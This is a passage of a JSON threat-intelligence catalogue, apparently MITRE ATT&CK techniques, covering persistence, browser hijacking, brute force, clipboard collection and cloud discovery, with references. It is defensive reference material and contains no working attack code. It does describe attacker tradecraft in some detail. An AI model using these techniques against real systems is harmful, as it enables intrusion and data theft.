],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "17b97c19-b986-4653-850a-44aee9aaaba1",
|
||
"value": "Boot or Logon Autostart Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup><sup>[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)]</sup> Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c51f799b-7305-43db-8d3b-657965cad68a",
|
||
"value": "Boot or Logon Initialization Scripts"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.<sup>[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)]</sup><sup>[[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]</sup>\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.<sup>[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)]</sup> Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.<sup>[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]</sup>\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.<sup>[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup><sup>[[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)]</sup><sup>[[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]</sup>\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://app.tidalcyber.com/tactics/94ffe549-1c29-438d-9c7f-e27f7acee0bb).<sup>[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)]</sup><sup>[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]</sup> Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726).<sup>[[Browers FriarFox](https://app.tidalcyber.com/references/3fe79fc8-c86d-57ad-961f-30fddd0e5f62)]</sup><sup>[[Browser Adrozek](https://app.tidalcyber.com/references/48afb730-b5e1-5a85-bb60-9ef9b536e397)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "040804f6-6a87-4011-8716-66682bc16ed4",
|
||
"value": "Browser Extensions"
|
||
},
|
||
{
|
||
"description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.<sup>[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]</sup>\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).<sup>[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f1af5c8b-3210-4788-a873-97b1518bb43a",
|
||
"value": "Browser Information Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.<sup>[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]</sup>\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.<sup>[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup> Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b57c5554-5a46-42cd-be7e-4206f79ef424",
|
||
"value": "Browser Session Hijacking"
|
||
},
|
||
{
|
||
"description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.<sup>[[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)]</sup> Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.<sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup> Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c16eef78-232e-47a2-98e9-046ec075b13c",
|
||
"value": "Brute Force"
|
||
},
|
||
{
|
||
"description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.<sup>[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]</sup>\n\nAn adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup> If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "49749e13-48ed-49fc-82d1-13ae13b457c1",
|
||
"value": "Build Image on Host"
|
||
},
|
||
{
|
||
"description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.<sup>[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)]</sup><sup>[[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)]</sup><sup>[[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)]</sup> Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243)).<sup>[[mining_ruby_reversinglabs](https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]</sup>\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.<sup>[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e8f90b73-2e59-4643-a274-78b85b8d9f88",
|
||
"value": "Clipboard Data"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. <sup>[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)]</sup><sup>[[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)]</sup>\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "944a7b91-c58e-567d-9e2c-515b93713c50",
|
||
"value": "Cloud Administration Command"
|
||
},
|
||
{
|
||
"description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)]</sup><sup>[[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)]</sup><sup>[[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)]</sup> Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project <sup>[[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)]</sup>, and Azure's CLI command <code>az vm list</code> lists details of virtual machines.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup> In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://app.tidalcyber.com/technique/a0e40412-cbfb-477b-87fc-40f2c84d26be).<sup>[[Malwarebytes OSINT Leaky Buckets - Hioureas](https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]</sup>\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. <sup>[[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)]</sup> Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "fd346e4e-b22f-4cae-bc24-946d7b14b5e1",
|
||
"value": "Cloud Infrastructure Discovery"
|
||
},
|
||
{
|
||
"description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.<sup>[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]</sup>\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "315ce434-ad6d-4dae-a1dd-6db944a44422",
|
||
"value": "Cloud Service Dashboard"
|
||
},
|
||
{
|
||
"description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.<sup>[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)]</sup><sup>[[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]</sup>\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.<sup>[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)]</sup><sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "5d0a3722-52b6-4968-a367-7ca6bc9a33fc",
|
||
"value": "Cloud Service Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS <sup>[[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)]</sup> and List Blobs in Azure<sup>[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)]</sup> .",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "92761d92-a288-4407-a112-bb2720f07d07",
|
||
"value": "Cloud Storage Object Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).\n\nThere are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.<sup>[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)]</sup><sup>[[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)]</sup><sup>[[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a2184d53-63b1-4c40-81ed-da799080c36c",
|
||
"value": "Command and Scripting Interpreter"
|
||
},
|
||
{
|
||
"description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.<sup>[[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)]</sup> Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0783c499-1564-4062-addc-f1ff86ef4e59",
|
||
"value": "Communication Through Removable Media"
|
||
},
|
||
{
|
||
"description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c6374cbe-799a-4648-b1e2-2a66bb42d3f3",
|
||
"value": "Compromise Accounts"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)<sup>[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)]</sup> prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.<sup>[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "05435e33-05fe-4a41-b8e4-694d45eb9147",
|
||
"value": "Compromise Host Software Binary"
|
||
},
|
||
{
|
||
"description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup><sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup> Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.<sup>[[FireEye DNS Hijack 